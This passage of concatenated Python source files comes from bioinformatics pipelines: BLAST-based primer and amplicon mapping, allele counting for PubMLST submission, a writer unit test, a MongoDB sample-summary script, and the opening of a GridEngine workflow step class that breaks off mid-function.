amplicon_info['{}_start_position'.format(locus)] = "{}".format(rr.get_min())
amplicon_info['{}_stop_position'.format(locus)] = "{}".format(rr.get_max())
#TODO: report something
else:
print("Warning feature {} not reported for locus {}".format(subregion,locus))
self.amplicon_info_list.append(amplicon_info)
##Returns a dict with entry for every locus that was searched for
#Tolerance keeps hits with bit-scores at tolerance*max_score
def map_primers_to_genome(self,blast_db,outfile=None,search_set=None,default_to_PCR=False,temp_dir = None, keep_temp=False, tolerance=1):
workingDir = temp_dir if temp_dir is not None else self.tempDirObj.name
if outfile == '':
outfile = None
if search_set == None:
search_set = set(self.primers_dict.keys())
temp_infile = os.path.join(workingDir,'tmp_primer.fasta')
temp_outfile = os.path.join(workingDir,'tmp_primer_blast.fasta')
blast_combined = blankBLASTtable()
ql_head = 'query_length' #new column to add
fh_head = 'forward hit'
export_regions = dict() #name for region, coordinates of innermost nucleotide on outermost primers (draw data from seq_borders dict in the sequencing reaction)
for locus in search_set:
if locus not in self.primers_dict.keys():
print("Error: {} is not in the set of primer loci".format(locus))
locus_dict = self.primers_dict[locus].copy() #so that I can modify it
if default_to_PCR: #Make sure there are primers for sequencing the entire region
seq_dict = locus_dict['Seq']
if 'All' not in seq_dict.keys():
seq_dict['All'] = locus_dict['PCR']['All']
export_regions[locus] = dict()
##Evaluate PCR dict first to find general range in which sequencing primers can bind
PCR_dict = locus_dict['PCR']
range_list = []
## Create a master range limit if specified
has_range = ('range_contig' in locus_dict.keys()
and 'range_from' in locus_dict.keys()
and 'range_to' in locus_dict.keys())
if has_range:
master_range = region_record(locus_dict['range_contig'],locus_dict['range_from'],locus_dict['range_to'])
range_list.append(master_range)
## Place BLAST hits into ranges
for (subregion, subregion_dict) in PCR_dict.items(): ##Only one region: "all"
for (primer,sequence) in subregion_dict.items():
#Write query file
my_seq = SeqRecord(Seq(sequence,IUPAC.ambiguous_dna),id="-".join([locus,'PCR',subregion,primer]))
with open(temp_infile,"w") as fout:
SeqIO.write(my_seq,fout,'fasta')
#Search BLAST
blast_cline = NcbiblastnCommandline(query=temp_infile,db=blast_db,outfmt=6,out=temp_outfile,task='blastn-short',evalue=1,reward=1,penalty=-1,gapopen=3,gapextend=2)
blast_cline() ##Should only print for errors
blast_table = loadBLASTtableToDataFrame(temp_outfile)
if keep_temp:
named_file = '{}_{}.tab'.format("-".join([locus,'PCR',subregion,primer]),os.path.basename(blast_db))
utilities.safeOverwriteTable(os.path.join(workingDir,named_file), blast_table, 'tab')
##Place best hits into ranges
if len(blast_table) > 0:
##Add some extra info to table
blast_table[ql_head] = len(my_seq)
blast_table[fh_head] = blast_table['s. start'] < blast_table['s. end']
## Limit table to best hits
best = blast_table.sort_values(by=['bit score'],ascending=False).iloc[0]
best_table = blast_table[blast_table['bit score'] >= tolerance*best['bit score']] #This may be too stringent; may need to revisit
## Add best hits to ranges
for _,this_hit in best_table.iterrows():
finished = False #if we found a range for it
for this_range in range_list:
if not finished: #stop upon success or if range is exclusive
finished = this_range.try_add_primer(this_hit['subject id'],this_hit['s. start'],this_hit[fh_head],True)
if this_range.exclusive and not finished:
finished = True
if len(best_table) == 1:
print("Warning: an exclusive hit failed to map to the prespecified region. Please report to developer(s)")
if not finished:
new_range = region_record()
new_range.try_add_primer(this_hit['subject id'],this_hit['s. start'],this_hit[fh_head],True)
range_list.append(new_range)
## Record best hits for reporting
blast_combined = pd.concat([blast_combined,best_table],sort=True)##Note: this is compatible with pandas 0.23 +; older versions will fail. Without sort, it makes FutureWarning and exception.
else:
print("Warning: zero hits for {}".format(my_seq.id))
##Merge any ranges that are close/overlapping; test if ranges are valid (primer pairs)
i = 0
ValidRanges = set()
while i < len(range_list):
this_range = range_list[i]
j = len(range_list)-1
while j > i:
merger = this_range.try_merge_regions(range_list[j])
if merger:
print("Warning: this is an exceptional situation and has not been tested, please report to developer(s). Range merger")
del(range_list[j])
j-=1
#Test validity of this_range
if (len(this_range.For_list) > 0 and len(this_range.Rev_list) > 0):
if this_range.get_min() < this_range.get_max():
ValidRanges.add(i)
i+=1
#Remove invaled ranges
range_list = [range_list[i] for i in ValidRanges]
#Report oddities
if len(range_list) == 0:
print("Warning: Unable to find an amplification region for {}".format(locus))
elif len(range_list) == 2:
print("Warning: Detected multiple amplification regions for {}".format(locus))
for this_range in range_list:
vprint('\n'+locus + ": Potential amplicon region")
vprint(this_range)
## Find the sequencing sites within the defined ranges
Seq_dict = locus_dict['Seq']
for (subregion, subregion_dict) in Seq_dict.items():
export_regions[locus][subregion] = dict()
seq_borders = dict() ##Use range as key to track where sequencing of subregion starts. Values outside of range indicate no matches
seq_primers = dict() ##primer names corresponding to border positions
for (primer,sequence) in subregion_dict.items():
my_seq = SeqRecord(Seq(sequence,IUPAC.ambiguous_dna),id="-".join([locus,'Seq',subregion,primer]))
with open(temp_infile,"w") as fout:
SeqIO.write(my_seq,fout,'fasta')
blast_cline = NcbiblastnCommandline(query=temp_infile,db=blast_db,outfmt=6,out=temp_outfile,task='blastn-short',evalue=1,reward=1,penalty=-1,gapopen=3,gapextend=2)
blast_cline() ##Should only print for errors
blast_table = loadBLASTtableToDataFrame(temp_outfile)
if len(blast_table) > 0:
##Add some extra info to table
blast_table[ql_head] = len(my_seq)
blast_table[fh_head] = blast_table['s. start'] < blast_table['s. end']
for my_range in range_list:
## Limit table to hits in range
r_min = my_range.get_min()
r_max = my_range.get_max()
if my_range not in seq_borders: ##TODO: this should probably be initialized immediately after declaration. Need to check that it doesn't break the downstream features
seq_borders[my_range] = [r_min -1, r_max+1]
seq_primers[my_range] = ['None','None']
range_table = blast_table[blast_table['subject id'] == my_range.contig]
range_table = range_table[range_table['s. end'] >= r_min]
range_table = range_table[range_table['s. end'] <= r_max]
if len(range_table) > 0:
## Limit table to best hits
best_in_range = range_table.sort_values(by=['bit score'],ascending=False).iloc[0]
range_table = range_table[range_table['bit score'] >= best_in_range['bit score']] #This may be too stringent; may need to revisit
if len(range_table) > 0:
if len(range_table) > 1:
export_line = "Warning: sequencing primer maps to multiple locations within PCR primers. Using outermost site: {}".format(my_seq.id)
# if __name__ != "__main__": ##Being called from an outside procedure...indent to indicated subsidiary position
# export_line = '\t'+export_line
print(export_line)
for _, hit in range_table.iterrows():
q_end = hit['q. end']
gap = len(my_seq) - q_end
s_end = hit['s. end']
is_for = hit[fh_head]
if is_for:
if seq_borders[my_range][0] < my_range.get_min():
seq_borders[my_range][0] = s_end
seq_primers[my_range][0] = primer
if gap > 0:
vprint("Warning: sequencing primer does not match template at 3' end. Sequence probably needs trimming on the low end: {}".format(my_seq.id))
else:
if seq_borders[my_range][0] > s_end:
seq_borders[my_range][0] = s_end
seq_primers[my_range][0] = primer
if gap > 0:
vprint("Warning: sequencing primer does not match template at 3' end. Sequence probably needs trimming on the low end: {}".format(my_seq.id))
vprint("Warning: multiple sequencing primers map in forward direction on template. Using outermost site: {}".format("-".join([locus,'Seq',subregion,seq_primers[my_range][0]])))
else:
if seq_borders[my_range][1] > my_range.get_max():
seq_borders[my_range][1] = s_end
seq_primers[my_range][1] = primer
if gap > 0:
vprint("Warning: sequencing primer does not match template at 3' end. Sequence probably needs trimming on the high end: {}".format(my_seq.id))
else:
if seq_borders[my_range][1] < s_end:
seq_borders[my_range][1] = s_end
seq_primers[my_range][1] = primer
if gap > 0:
vprint("Warning: sequencing primer does not match template at 3' end. Sequence probably needs trimming on the high end: {}".format(my_seq.id))
vprint("Warning: multiple sequencing primers map in reverse direction on template. Using outermost site: {}".format("-".join([locus,'Seq',subregion,seq_primers[my_range][1]])))
else:
print("Warning: sequencing primer failed to map within PCR primers: {}".format(my_seq.id))
## Record best hits for reporting
best_table = blast_table[blast_table['bit score'] >= best_in_range['bit score']] #This may be too stringent; may need to revisit
#~ print("Identified {} hits above threshold used for best in range".format(len(best_table)))
blast_combined = pd.concat([blast_combined,best_table],sort=True) ##Note: this is compatible with pandas 0.23 +; older versions will fail.
else:
print("Warning: sequencing primer does not map to within PCR product. Exporting all matches for {}".format(my_seq.id))
blast_combined = pd.concat([blast_combined,blast_table],sort=True) ##Note: this is compatible with pandas 0.23 +; older versions will fail.
##Export sequencing start sites
basename = locus
if subregion != 'All':
basename += '_' + subregion
for my_range in range_list:
if my_range in seq_primers:
name = basename
name += '_{}_{}_{}'.format(seq_primers[my_range][0],seq_primers[my_range][1],os.path.basename(os.path.splitext(blast_db)[0])) ##Convoluted way to get the genome name
export_regions[locus][subregion][name] = {'contig':my_range.contig,'start':seq_borders[my_range][0]+1,'stop':seq_borders[my_range][1]-1}
else: ##seq_primers never got initialized because there is no match.
print("Notice: No sequencing primers for {} mapped with in the defined range for {}.".format(subregion,locus))
#I could add a way to orient the sequences (identify a reference primer)
export_regions[locus]['OuterRange'] = range_list
os.remove(temp_infile)
os.remove(temp_outfile)
if outfile != None:
blast_combined.to_csv(outfile,index=False) ##columns=blast_default_headers+[ql_head,fh_head]
export_line = 'Exported primer locations to '+outfile
# if __name__ != "__main__": ##Being called from an outside procedure...indent to indicated subsidiary position
# export_line = '\t'+export_line
print(export_line)
# current_verbose = default_verbose
return export_regions
def finish(self,keep_temp=False):
if self.amplicon_info_file is not None:
utilities.safeOverwriteTable(self.amplicon_info_file,pd.DataFrame(data=self.amplicon_info_list),'tab',index=False)
if keep_temp:
copytree(self.tempDirObj.name,os.path.join(self.outDir,'temp'))
class region_record:
limit = 5000 #primers more than 5kb apart are considered different regions
def __init__(self,exclusive_contig=None,exclusive_start=None,exclusive_stop=None):
self.bestHitCounter = 0
self.For_list = []
self.Rev_list = []
self.contig = 'Not specified'
if exclusive_contig != None:
self.exclusive = True ##An exclusive range cannot expand
if exclusive_start >= exclusive_stop:
raise Exception("Region definition must start before stop")
self.contig = exclusive_contig
self.For_list.append(exclusive_start)
self.Rev_list.append(exclusive_stop)
else:
self.exclusive = False
if (exclusive_start != None) or (exclusive_stop != None):
raise Exception("Cannot define an exclusive region without a contig name")
def __str__(self):
Fcnt = len(self.For_list)
Rcnt = len(self.Rev_list)
minF = min(self.For_list) if Fcnt > 0 else "N/A"
maxR = max(self.Rev_list) if Rcnt > 0 else "N/A"
return ("Predefined Exclusive Search Range: {}\n"
"Contig: {} \n"
"Number of best hits: {}\n"
"Number of forward hits: {}\n"
"Number of reverse hits: {} \n"
"First forward hit: {} \n"
"Last reverse hit: {} \n".format(self.exclusive,self.contig,self.bestHitCounter,Fcnt,Rcnt,minF,maxR))
def __repr__(self):
return "region_record with {} primers".format(len(self.For_list+self.Rev_list))
def try_add_primer(self,this_contig,start,is_forward,best):
##Test if it is a new range
new = not self.exclusive and len(self.For_list) == 0 and len(self.Rev_list) == 0
##Test if it fits into an existing range
success = False
if new:
self.contig = this_contig
success = True
elif (this_contig == self.contig): #must be on same contig for starters
full_list = self.For_list + self.Rev_list
min_limit = min(full_list)
max_limit = max(full_list)
if not self.exclusive: ##An exclusive range cannot expand
min_limit -= region_record.limit
max_limit += region_record.limit
success = (start > min_limit) and (start < max_limit)
##Add primer if it fits into range
if success:
if best:
self.bestHitCounter += 1
if is_forward:
self.For_list.append(start)
else:
self.Rev_list.append(start)
return success
def try_merge_regions(self,other):
if self.exclusive or other.exclusive:
raise Exception("Exclusive ranges should never coexist with others")
full_list = self.For_list + self.Rev_list
min_limit = min(full_list)
max_limit = max(full_list)
min_limit -= region_record.limit #could store the value
max_limit += region_record.limit
other_all = other.For_list + other.Rev_list
other_min = min(other_all)
other_max = max(other_all)
success = (self.contig == other.contig
and (((other_max > min_limit) and (other_max < max_limit)) #other max is inside limits
or ((other_min > min_limit) and (other_min < max_limit)) # other_min is inside limits
or ((other_min < min_limit) == (other_max > max_limit)) # or one stradles the other
))
if success:
self.For_list.extend(other.For_list)
self.Rev_list.extend(other.Rev_list)
return success
#Test that list is not empty before calling
def get_min(self):
return min(self.For_list)
def get_max(self):
return max(self.Rev_list)
##Locate primers on genome, and extract the sequenced regions from within the amplicons
##This will fail if it is given funny genome filenames (spaces, etc)
import argparse
def main():
### Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('-p','--primer_file',help='Location of primer information',required=True)
parser.add_argument('-r','--repository',help='Location of genome assembly repository')
parser.add_argument('--keep_temp',action='store_true',help='Keep temporary BLAST files')
parser.add_argument('--version','-V',action='version',version='%(prog)s {}.{}'.format(script_version,script_subversion))
parser.add_argument('args', nargs=argparse.REMAINDER)
args = parser.parse_args()
argv = [os.path.basename(__file__)] + args.args
# stdout = utilities.Logger(os.path.join(_outDir,"LocusExtractor.log"))
repository = None
default_settings = os.path.join(os.path.dirname(__file__),genomeOrganizer.SETTING_FILE)
if args.repository:
repository = args.repository
gd = genomeOrganizer.placeAssembliesIntoDataFrame(argv,GO_settings=default_settings,repository=repository)
if gd is not None:
primer_file = args.primer_file
extractor = AmpliconExtractor(primer_file,generate_output=True)
logFile = os.path.join(extractor.outDir,"AmpliconExtractor.log") if extractor.outDir is not None else "AmpliconExtractor.log" ##TODO find a better default location
sys.stdout = utilities.Logger(logFile)
if extractor.outDir is not None:
utilities.safeOverwriteTable(genomeOrganizer.default_list(extractor.outDir), gd, 'tab')
for _,row in gd.iterrows():
(file_format,compressed) = utilities.guessFileFormat(row.loc['Filename'])
extractor.evaluateGenome(row.loc['Lab_ID'],row.loc['Filename'],file_format,compressed,keep_temp=args.keep_temp)
## If I have to sort the columns somewhat (from LocusExtractor -- should be a function)
# cols = self.allele_table_columns_initial + [c.strip() for c in column_order if c not in self.allele_table_columns_initial]
# remainder = [c.strip() for c in self.allele_table.columns.tolist() if c not in cols]
# remainder.sort(key=lambda s: s.lower())
# cols += remainder
extractor.finish(keep_temp=args.keep_temp)
print("Finished. Results saved at {}".format(extractor.outDir))
if __name__ == "__main__":
if not utilities.has_preferred_python():
raise Exception("Upgrade your python version")
main()
```
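The `region_record` helper above groups primer BLAST hits into candidate amplicon ranges. A small sketch of how it accumulates forward and reverse hits (coordinates are invented; importing the module pulls in its pandas/Biopython/BLAST helper dependencies):

```python
from AmpliconExtractor import region_record

rr = region_record()
rr.try_add_primer("contig_1", 1200, is_forward=True, best=True)   # forward PCR primer hit
rr.try_add_primer("contig_1", 3400, is_forward=False, best=True)  # reverse PCR primer hit
print(rr.contig, rr.get_min(), rr.get_max())  # contig_1 1200 3400
print(rr)  # multi-line summary of the range and its hit counts
```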
#### File: pipeline/locusextractor/new_allele_submission_tool.py
```python
from Bio import SeqIO
# import sys
# sys.path.append('/scicomp/home/ymw8/ML/tools/Utility/')
# sys.path.append('/scicomp/home/ymw8/ML/tools/LocusExtractor')
import utilities
from collections import defaultdict
import argparse
script_version = 0.1
script_subversion = 2
def main():
parser = argparse.ArgumentParser(description='A program to identify unique alleles for submission to PubMLST. Default behavior is to count the occurrences of distinct sequences in a multi-fasta file',)
parser.add_argument('--version','-V',action='version',version='%(prog)s {}.{}'.format(script_version,script_subversion))
    parser.add_argument('filename', help="Provide a multi-fasta file that needs to be analyzed. Designed for Locus Extractor's 'mismatch_DNA'")
parser.add_argument('--split',action='store_true', help="Separate sequences based on locus inferred from name before counting")
parser.add_argument('--save_split',action='store_true',help="Create multi-fasta files for each gene that is identified in the file")
    parser.add_argument('--gene_part','-gp',type=int,default=1,help='Number of underscores preceding the gene name in the output file')
args = parser.parse_args()
filename = args.filename
seqs = SeqIO.parse(filename,'fasta')
genelists = split_LE_mismatch_file(seqs,args.gene_part) if (args.split or args.save_split) else {'All':seqs}
for gene,g_seq in genelists.items():
if args.save_split:
outfile = utilities.appendToFilename(filename,"_"+gene)
print("Saving to "+outfile)
SeqIO.write(g_seq,outfile,'fasta')
g_counts = count_allele_occurances(g_seq)
for k,v in g_counts.items():
k.description = "{} observations".format(v)
count_outfile = utilities.appendToFilename(filename,"_"+gene+'_counts')
SeqIO.write([x for x in g_counts.keys()],count_outfile,'fasta')
##Seqs is an iterable that will produce SeqRecords
def split_LE_mismatch_file(seqs,gene_part):
genelists = defaultdict(list)
for s in seqs:
parts = s.id.split('_') ##This comes from LocusExtractor Genome_genome_similarityIinfo...
gene = parts[gene_part] if (len(parts[1]) > 0) else "partial_"+parts[2] ##Some genomes use underscore as replacement for single quote to indicate partial gene
if gene.startswith('-'): ##A hack from replacing underscore with dash (underscore being used as designation for partial since prime is illegal)
gene = gene.replace('-','partial_')
if gene[0].isupper(): ##Peptides are distinguished by upper case. I used an underscore in a gene name ... Hi_adk
gene += '_pep'
genelists[gene].append(s)
return genelists
##Seqs is an iterable that will produce SeqRecords
def count_allele_occurances(seqs):
allele_counts = defaultdict(int)
for s in seqs:
found = False
for r in allele_counts:
if str(s.seq) == str(r.seq):
allele_counts[r] += 1
found = True
print('{} matches {}'.format(s.id,r.id))
if not found:
allele_counts[s] += 1
return allele_counts
if __name__ == "__main__":
if not utilities.has_preferred_python():
raise Exception("Upgrade your python version")
main()
```
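The `count_allele_occurances` helper above compares raw sequence strings to tally identical alleles. Below is a minimal, self-contained sketch of the same counting idea; it keys on the plain sequence string rather than on SeqRecord objects (a simplification of the function above), and the record IDs and sequences are made up for illustration.
```python
from collections import defaultdict
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord

records = [
    SeqRecord(Seq("GACTAGACTTAGT"), id="allele1"),
    SeqRecord(Seq("GACTAGACTTAGT"), id="allele2"),
    SeqRecord(Seq("GACTATAACTTAA"), id="allele3"),
]
counts = defaultdict(int)
for rec in records:
    counts[str(rec.seq)] += 1          # identical sequences collapse onto one key
for seq_string, n in counts.items():
    print("{}: {} observations".format(seq_string, n))
```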
#### File: locusextractor/tests/AlleleWriterManagerTest.py
```python
import sys
sys.path.append('..')
from AlleleWriterManager import AlleleWriterManager
import unittest
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
import os
class seq_utilitiesTest(unittest.TestCase):
def setUp(self):
self.s1 = 'GACTAGACTTAGT'
self.s2 = 'GACTATAACTTAATATAG'
self.s3 = 'GACTATAACTTAATATAC'
self.seq1 = Seq(self.s1)
self.seq2 = Seq(self.s2)
self.seq3 = Seq(self.s3)
self.sr1 = SeqRecord(self.seq1)
self.sr2 = SeqRecord(self.seq2)
self.sr3 = SeqRecord(self.seq3)
self.fastq2 = SeqRecord(self.seq2,"test",letter_annotations = {"phred_quality":[1,2,4,10,20,25,33,22,33,35,18,11,23,8,2,1,2,0]})
def test_fastq(self):
writer = AlleleWriterManager("WriterTests",set(['a','b','c']))
writer.writeToFile('a',self.fastq2)
fasta_name = os.path.join(writer.directory,"a_alleles.fasta")
self.assertTrue(os.path.exists(fasta_name),"Cannot find {}".format(os.path.abspath(fasta_name)))
with open(fasta_name) as fin:
seqs = SeqIO.to_dict(SeqIO.parse(fin,'fasta'))
self.assertEqual(len(seqs),1, "Should have a single sequence in {}".format(fasta_name))
fastq_name = os.path.join(writer.directory,"a_alleles.fastq")
self.assertTrue(os.path.exists(fastq_name),"Cannot find {}".format(os.path.abspath(fastq_name)))
with open(fastq_name) as fin:
seqs = SeqIO.to_dict(SeqIO.parse(fin,'fastq'))
self.assertEqual(len(seqs),1, "Should have a single sequence in {}".format(fastq_name))
writer.deleteFiles()
#
def test_multi(self):
writer = AlleleWriterManager("WriterTests",set(['a','b','c'])) ##Needs to write to a different folder
writer.writeToFile('a',self.seq1,name='seq1')
writer.writeToFile('a',self.seq2,name='seq2')
fasta_name = os.path.join(writer.directory,"a_alleles.fasta")
self.assertTrue(os.path.exists(fasta_name),"Cannot find {}".format(os.path.abspath(fasta_name)))
with open(fasta_name) as fin:
seqs = SeqIO.to_dict(SeqIO.parse(fin,'fasta'))
self.assertEqual(len(seqs),2, "Should have two sequences in {}".format(fasta_name))
writer.deleteFiles()
#
# def test_trimFASTQ(self):
# trimmed = trimFASTQtoFirstBase(self.fastq2, 10)
# self.assertEqual(self.seq2.find(trimmed.seq),3,"Left trim is wrong 1")
# self.assertEqual(self.seq2.reverse_complement().find(trimmed.seq.reverse_complement()),5,"Right trim in wrong")
# trimmed = trimFASTQtoFirstBase(self.fastq2, 40)
# self.assertEquals(trimmed,None,"Sequence should be discarded")
# trimmed = trimFASTQtoFirstBase(self.fastq2, 22)
# self.assertEqual(self.seq2.find(trimmed.seq),5,"Left trim is wrong 2")
# self.assertEqual(self.seq2.reverse_complement().find(trimmed.seq.reverse_complement()),5,"Right trim in wrong")
# trimmed = trimFASTQtoFirstBase(self.fastq2, 23)
# self.assertEqual(self.seq2.find(trimmed.seq),5,"Left trim is wrong 3")
# self.assertEqual(self.seq2.reverse_complement().find(trimmed.seq.reverse_complement()),5,"Right trim in wrong")
# trimmed = trimFASTQtoFirstBase(self.fastq2, 35)
# self.assertEqual(len(trimmed),1,"trimmed too long")
# self.assertEqual(trimmed[0],self.fastq2[10],"Wrong base recovered")
if __name__ == '__main__':
unittest.main()
```
#### File: BMGAP/pipeline/sample_summary_collection.py
```python
import sys
import re
import logging
import argparse
import pymongo
def main(db, identifier):
field_list = {
"identifier": "identifier",
"Lab_ID": "Lab_ID",
"Assembly_ID": "Assembly_ID",
"Run_ID": "Run_ID",
"QC_flagged": "QC_flagged",
"Submitter": "Submitter",
"assemblyPath": "assemblyPath",
"MLST": "MLST.ST",
"cc": "MLST.Nm_MLST_cc",
"Serotype": "Serotype.ST",
"Serogroup": "Serogroup.SG",
"location": "BML_Data.location",
"country": "BML_Data.country",
"year": "BML_Data.year",
"sample_type": "BML_Data.sample_type",
"sample_order": "sample_order",
"Species": "mash.Top_Species",
"sequence_flagged": "sequence_flagged",
"assembly_flagged": "assembly_flagged",
}
if identifier == "all":
summarize_all_samples(db, field_list)
elif identifier:
sample_summary = summarize_single_sample(db, identifier, field_list)
db.sample_summary.update_one(
{"identifier": identifier}, {"$set": sample_summary}, upsert=True
)
else:
print("Specify which identifier to make summary for")
sys.exit(2)
def summarize_all_samples(db, field_list):
all_identifiers = db.internal.find({}, {"identifier": 1, "_id": 0})
for identifier in all_identifiers:
logging.error(identifier)
sample_summary = summarize_single_sample(
db, identifier["identifier"], field_list
)
if sample_summary:
db.sample_summary.update_one(
{"identifier": identifier["identifier"]},
{"$set": sample_summary},
upsert=True,
)
for field in field_list.keys():
logging.error(field)
db.sample_summary.create_index(
[(field, pymongo.ASCENDING), (field, pymongo.DESCENDING)]
)
def summarize_single_sample(db, identifier, field_list):
new_sample_dict = {}
rec = db.internal.find_one({"identifier": identifier})
for name, field in field_list.items():
if re.search("\.", field):
fields = field.split(".")
if fields[0] in rec and fields[1] in rec[fields[0]]:
new_sample_dict[name] = rec[fields[0]][fields[1]]
elif field in rec:
new_sample_dict[name] = rec[field]
if new_sample_dict and "Run_ID" in new_sample_dict.keys():
logging.error(identifier)
logging.error(new_sample_dict["Run_ID"])
run_info = db.runs.find_one({"run": new_sample_dict["Run_ID"]})
if run_info and "sequencer" in run_info.keys():
new_sample_dict["sequencer"] = run_info["sequencer"]
if (
"mash" in new_sample_dict.keys()
and "Notes" in new_sample_dict["mash"].keys()
):
if (
run_info["mash"]["Notes"]
== "No_hit_above_threshold_from_reference_collection_Reporting_top_refseq_hit"
):
new_sample_dict["species_flagged"] = True
else:
new_sample_dict["species_flagged"] = False
if "cleanData" in new_sample_dict.keys():
if "Mean_Coverage_raw" in new_sample_dict["cleanData"].keys():
if new_sample_dict["cleanData"]["Mean_Coverage_raw"] < 25:
new_sample_dict["assembly_flagged"] = True
new_sample_dict["QC_flagged"] = True
else:
new_sample_dict["assembly_flagged"] = False
if (
"HalfCov_Percent" in new_sample_dict["cleanData"].keys()
or "Discarded_Percent" in new_sample_dict["cleanData"].keys()
):
if (
new_sample_dict["cleanData"]["HalfCov_Percent"] > 1
or new_sample_dict["cleanData"]["Discarded_Percent"] > 5
):
new_sample_dict["sequence_flagged"] = True
new_sample_dict["QC_flagged"] = True
else:
new_sample_dict["sequence_flagged"] = False
return new_sample_dict
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# database
parser.add_argument(
"-d", "--db_host", action="store", default="bmgap-poc.biotech.cdc.gov"
)
# identifier
parser.add_argument("-i", "--identifier", action="store", required=True)
args = vars(parser.parse_args())
client = pymongo.MongoClient(
args["db_host"],
27017,
username="bmgap-writer",
password="<PASSWORD>",
authSource="BMGAP",
)
db = client.BMGAP
main(db, args["identifier"])
``` |
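A small self-contained sketch of the dotted-field lookup used in `summarize_single_sample`, run against a plain dict instead of a MongoDB record; the field names and values below are illustrative only.
```python
import re

field_list = {"MLST": "MLST.ST", "Lab_ID": "Lab_ID"}          # summary name -> (possibly dotted) source field
rec = {"MLST": {"ST": 11, "Nm_MLST_cc": "cc11"}, "Lab_ID": "M12345"}

summary = {}
for name, field in field_list.items():
    if re.search(r"\.", field):                               # nested field, e.g. "MLST.ST"
        outer, inner = field.split(".")
        if outer in rec and inner in rec[outer]:
            summary[name] = rec[outer][inner]
    elif field in rec:                                        # flat field
        summary[name] = rec[field]
print(summary)                                                # {'MLST': 11, 'Lab_ID': 'M12345'}
```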
{
"source": "82ndAirborneDiv/geneflow2",
"score": 3
} |
#### File: geneflow/extend/gridengine_step.py
```python
import drmaa
import os
from slugify import slugify
import shutil
from geneflow.log import Log
from geneflow.workflow_step import WorkflowStep
from geneflow.data_manager import DataManager
from geneflow.uri_parser import URIParser
class GridengineStep(WorkflowStep):
"""
A class that represents GridEngine Workflow Step objects.
Inherits from the "WorkflowStep" class.
"""
def __init__(
self,
job,
step,
app,
inputs,
parameters,
config,
depend_uris,
data_uris,
source_context,
clean=False,
gridengine={}
):
"""
Instantiate GridEngineStep class by calling the super class constructor.
See documentation for WorkflowStep __init__().
"""
super(GridengineStep, self).__init__(
job,
step,
app,
inputs,
parameters,
config,
depend_uris,
data_uris,
source_context,
clean
)
# gridengine context data
self._gridengine = gridengine
self._job_status_map = {
drmaa.JobState.UNDETERMINED: 'UNKNOWN',
drmaa.JobState.QUEUED_ACTIVE: 'PENDING',
drmaa.JobState.SYSTEM_ON_HOLD: 'PENDING',
drmaa.JobState.USER_ON_HOLD: 'PENDING',
drmaa.JobState.USER_SYSTEM_ON_HOLD: 'PENDING',
drmaa.JobState.RUNNING: 'RUNNING',
drmaa.JobState.SYSTEM_SUSPENDED: 'RUNNING',
drmaa.JobState.USER_SUSPENDED: 'RUNNING',
drmaa.JobState.DONE: 'FINISHED',
drmaa.JobState.FAILED: 'FAILED'
}
def initialize(self):
"""
Initialize the GridEngineStep class.
Validate that the step context is appropriate for this "gridengine" context.
And that the app contains a "gridengine" definition.
Args:
self: class instance.
Returns:
On success: True.
On failure: False.
"""
# make sure the step context is local
if self._step['execution']['context'] != 'gridengine':
msg = (
'"gridengine" step class can only be instantiated with a'
' step definition that has a "gridengine" execution context'
)
Log.an().error(msg)
return self._fatal(msg)
# make sure app has a local implementation
# local def can be used by gridengine because it just needs a shell script
if 'local' not in self._app['implementation']:
msg = (
'"gridengine" step class can only be instantiated with an app that'
' has a "local" implementation'
)
Log.an().error(msg)
return self._fatal(msg)
if not super(GridengineStep, self).initialize():
msg = 'cannot initialize workflow step'
Log.an().error(msg)
return self._fatal(msg)
return True
def _init_data_uri(self):
"""
Create output data URI for the source context (local).
Args:
self: class instance.
Returns:
On success: True.
On failure: False.
"""
# make sure the source data URI has a compatible scheme (local)
if self._parsed_data_uris[self._source_context]['scheme'] != 'local':
msg = 'invalid data uri scheme for this step: {}'.format(
self._parsed_data_uris[self._source_context]['scheme']
)
Log.an().error(msg)
return self._fatal(msg)
# delete old folder if it exists and clean==True
if (
DataManager.exists(
parsed_uri=self._parsed_data_uris[self._source_context]
)
and self._clean
):
if not DataManager.delete(
parsed_uri=self._parsed_data_uris[self._source_context]
):
Log.a().warning(
'cannot delete existing data uri: %s',
self._parsed_data_uris[self._source_context]['chopped_uri']
)
# create folder
if not DataManager.mkdir(
parsed_uri=self._parsed_data_uris[self._source_context],
recursive=True
):
msg = 'cannot create data uri: {}'.format(
self._parsed_data_uris[self._source_context]['chopped_uri']
)
Log.an().error(msg)
return self._fatal(msg)
# create _log folder
if not DataManager.mkdir(
uri='{}/_log'.format(
self._parsed_data_uris[self._source_context]['chopped_uri']
),
recursive=True
):
msg = 'cannot create _log folder in data uri: {}/_log'.format(
self._parsed_data_uris[self._source_context]['chopped_uri']
)
Log.an().error(msg)
return self._fatal(msg)
return True
def _get_map_uri_list(self):
"""
Get the contents of the map URI (local URI).
Args:
self: class instance.
Returns:
Array of base file names in the map URI. Returns False on
exception.
"""
# make sure map URI is compatible scheme (local)
if self._parsed_map_uri['scheme'] != 'local':
msg = 'invalid map uri scheme for this step: {}'.format(
self._parsed_map_uri['scheme']
)
Log.an().error(msg)
return self._fatal(msg)
# get file list from URI
file_list = DataManager.list(parsed_uri=self._parsed_map_uri)
if file_list is False:
msg = 'cannot get contents of map uri: {}'\
.format(self._parsed_map_uri['chopped_uri'])
Log.an().error(msg)
return self._fatal(msg)
return file_list
def _run_map(self, map_item):
"""
Run a job for each map item and store the job ID.
Args:
self: class instance.
map_item: map item object (item of self._map).
Returns:
On success: True.
On failure: False.
"""
# load default app inputs, overwrite with template inputs
inputs = {}
for input_key in self._app['inputs']:
if input_key in map_item['template']:
inputs[input_key] = map_item['template'][input_key]
else:
if self._app['inputs'][input_key]['default']:
inputs[input_key] = self._app['inputs'][input_key]['default']
# load default app parameters, overwrite with template parameters
parameters = {}
for param_key in self._app['parameters']:
if param_key in map_item['template']:
parameters[param_key] = map_item['template'][param_key]
else:
if self._app['parameters'][param_key]['default'] not in [None, '']:
parameters[param_key] \
= self._app['parameters'][param_key]['default']
# get full path of wrapper script
path = shutil.which(self._app['implementation']['local']['script'])
if not path:
            msg = 'wrapper script not found in path: {}'.format(
self._app['implementation']['local']['script']
)
Log.an().error(msg)
return self._fatal(msg)
# construct argument list for wrapper script
args = [path]
for input_key in inputs:
if inputs[input_key]:
args.append('--{}={}'.format(
input_key,
